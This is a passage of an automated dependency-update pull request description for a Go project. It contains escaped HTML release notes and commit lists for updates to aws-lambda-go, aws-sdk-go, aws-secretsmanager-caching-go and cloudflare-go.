href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.52.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elambdacontext\u003c/code\u003e feature: Adding structured logging helper by \u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: always return PhysicalResourceID for CFn CustomResources by \u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003edocumentation rework by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/608\"\u003eaws/aws-lambda-go#608\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ca19f6ff85c6e7e87430d86d98d64a2d461dbabf\"\u003e\u003ccode\u003eca19f6f\u003c/code\u003e\u003c/a\u003e Allow ClientContext.Custom unmarshaling for non-string (JSON) values (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9c32960087517ddf57e3d405fae5e8e5e730f4cc\"\u003e\u003ccode\u003e9c32960\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/619\"\u003e#619\u003c/a\u003e from maximrub/inbound-federation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ebe38d988fd6f254f2c818c1bd12e15df52577f3\"\u003e\u003ccode\u003eebe38d9\u003c/code\u003e\u003c/a\u003e add support for Cognito Inbound federation Lambda trigger\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/71624ac50ffdcb73bce436c791caadfb468a8abc\"\u003e\u003ccode\u003e71624ac\u003c/code\u003e\u003c/a\u003e Fix spelling typos (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/616\"\u003e#616\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/33e4dc3007f6898e4031ac3b04520a21c0a4fb8c\"\u003e\u003ccode\u003e33e4dc3\u003c/code\u003e\u003c/a\u003e Update workflows for go 1.26 (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/617\"\u003e#617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/e1cb4611fc8ef22a40196b19651a33487b846a01\"\u003e\u003ccode\u003ee1cb461\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/612\"\u003e#612\u003c/a\u003e from yhamano0312/feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/a66ce2dc84f235c83f927524f218a106aa3f0c93\"\u003e\u003ccode\u003ea66ce2d\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9dac8a59d3d97d63314ac5ffc7d12475eaa0a76a\"\u003e\u003ccode\u003e9dac8a5\u003c/code\u003e\u003c/a\u003e Add structured logging helper (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/614\"\u003e#614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/6252f73f51494b482a1ff1b21b84bb764add35b2\"\u003e\u003ccode\u003e6252f73\u003c/code\u003e\u003c/a\u003e fix: always return PhysicalResourceID for CFn CustomResources (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/613\"\u003e#613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/be52e48b133401d28c9f19b746989c4f1458b816\"\u003e\u003ccode\u003ebe52e48\u003c/code\u003e\u003c/a\u003e feat: add lifecycle event data structure and corresponding test for S3 events\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.47.0...v1.54.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-secretsmanager-caching-go` from 1.1.3 to 1.2.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/releases\"\u003egithub.com/aws/aws-secretsmanager-caching-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.2.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdding refreshNow functionality to the cache by \u003ca href=\"https://github.com/wlewis4321\"\u003e\u003ccode\u003e@​wlewis4321\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/pull/77\"\u003eaws/aws-secretsmanager-caching-go#77\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.18.0 to 0.23.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/pull/78\"\u003eaws/aws-secretsmanager-caching-go#78\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/wlewis4321\"\u003e\u003ccode\u003e@​wlewis4321\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/pull/77\"\u003eaws/aws-secretsmanager-caching-go#77\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/pull/78\"\u003eaws/aws-secretsmanager-caching-go#78\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/compare/v1.1.3...v1.2.0\"\u003ehttps://github.com/aws/aws-secretsmanager-caching-go/compare/v1.1.3...v1.2.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/commit/74e0c73356dda04a16b9c09d4983104c115f9b77\"\u003e\u003ccode\u003e74e0c73\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.18.0 to 0.23.0 (\u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/issues/78\"\u003e#78\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/commit/acd923a19735cba44fadc0b1bae1a50d4f539b77\"\u003e\u003ccode\u003eacd923a\u003c/code\u003e\u003c/a\u003e Adding refreshNow functionality to the cache (\u003ca href=\"https://redirect.github.com/aws/aws-secretsmanager-caching-go/issues/77\"\u003e#77\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/commit/0a82475bedffd5ce14f2231498cba2b59b3b261a\"\u003e\u003ccode\u003e0a82475\u003c/code\u003e\u003c/a\u003e Update CODEOWNERS\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-secretsmanager-caching-go/compare/v1.1.3...v1.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/cloudflare/cloudflare-go` from 0.104.0 to 0.116.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/cloudflare/cloudflare-go/releases\"\u003egithub.com/cloudflare/cloudflare-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.116.0\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_service_tokens: Added graceful rotation support for client secrets (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/4189\"\u003e#4189\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.115.0\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_service_token: add \u003ccode\u003elast_seen_at\u003c/code\u003e field (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3838\"\u003e#3838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edns: Add settings to DNSRecord (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3670\"\u003e#3670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eteams_rules: add support for biso admin controls v2 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3848\"\u003e#3848\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps dependabot/fetch-metadata from 2.2.0 to 2.3.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3865\"\u003e#3865\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps github.com/go-git/go-git/v5 from 5.11.0 to 5.13.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3869\"\u003e#3869\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps github.com/goccy/go-json from 0.10.4 to 0.10.5 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3870\"\u003e#3870\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.25.0 to 0.33.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3868\"\u003e#3868\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.114.0\u003c/h2\u003e\n\u003cp\u003eNOTES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erulesets: remove \u003ccode\u003ehttp_request_sbfm\u003c/code\u003e phase (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3824\"\u003e#3824\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eworkers: The \u003ccode\u003eplacement_mode\u003c/code\u003e attribute in script upload responses has been deprecated. The new attribute \u003ccode\u003eplacement.mode\u003c/code\u003e should be used instead. (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3825\"\u003e#3825\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_application: added more fields to private destinations (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3829\"\u003e#3829\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eteams_rules: add support for \u003ccode\u003eresolve_dns_internally\u003c/code\u003e settings on dns_resolver rules (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3779\"\u003e#3779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ewaiting_room: add waiting room turnstile integration fields (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3764\"\u003e#3764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eworkers: Add new \u003ccode\u003eplacement\u003c/code\u003e attribute object in script upload responses. It contains the \u003ccode\u003emode\u003c/code\u003e and \u003ccode\u003estatus\u003c/code\u003e attributes. (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3825\"\u003e#3825\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.33.0 to 0.34.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3796\"\u003e#3796\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps golang.org/x/time from 0.8.0 to 0.9.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3783\"\u003e#3783\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.113.0\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eteams_location: make location parameters optional (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3758\"\u003e#3758\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.32.0 to 0.33.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3756\"\u003e#3756\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.112.0\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_application: support Access service token + multi-valued authentication for SCIM provisioning (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3708\"\u003e#3708\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/cloudflare/cloudflare-go/blob/v0.116.0/CHANGELOG.md\"\u003egithub.com/cloudflare/cloudflare-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.116.0 (September 5th, 2025)\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_service_tokens: Added graceful rotation support for client secrets (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/4189\"\u003e#4189\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.115.0 (January 29th, 2025)\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_service_token: add \u003ccode\u003elast_seen_at\u003c/code\u003e field (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3838\"\u003e#3838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edns: Add settings to DNSRecord (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3670\"\u003e#3670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eteams_rules: add support for biso admin controls v2 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3848\"\u003e#3848\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps dependabot/fetch-metadata from 2.2.0 to 2.3.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3865\"\u003e#3865\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps github.com/go-git/go-git/v5 from 5.11.0 to 5.13.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3869\"\u003e#3869\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps github.com/goccy/go-json from 0.10.4 to 0.10.5 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3870\"\u003e#3870\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.25.0 to 0.33.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3868\"\u003e#3868\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.114.0 (January 15th, 2025)\u003c/h2\u003e\n\u003cp\u003eNOTES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erulesets: remove \u003ccode\u003ehttp_request_sbfm\u003c/code\u003e phase (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3824\"\u003e#3824\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eworkers: The \u003ccode\u003eplacement_mode\u003c/code\u003e attribute in script upload responses has been deprecated. The new attribute \u003ccode\u003eplacement.mode\u003c/code\u003e should be used instead. (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3825\"\u003e#3825\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eaccess_application: added more fields to private destinations (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3829\"\u003e#3829\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eteams_rules: add support for \u003ccode\u003eresolve_dns_internally\u003c/code\u003e settings on dns_resolver rules (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3779\"\u003e#3779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ewaiting_room: add waiting room turnstile integration fields (\u003ca 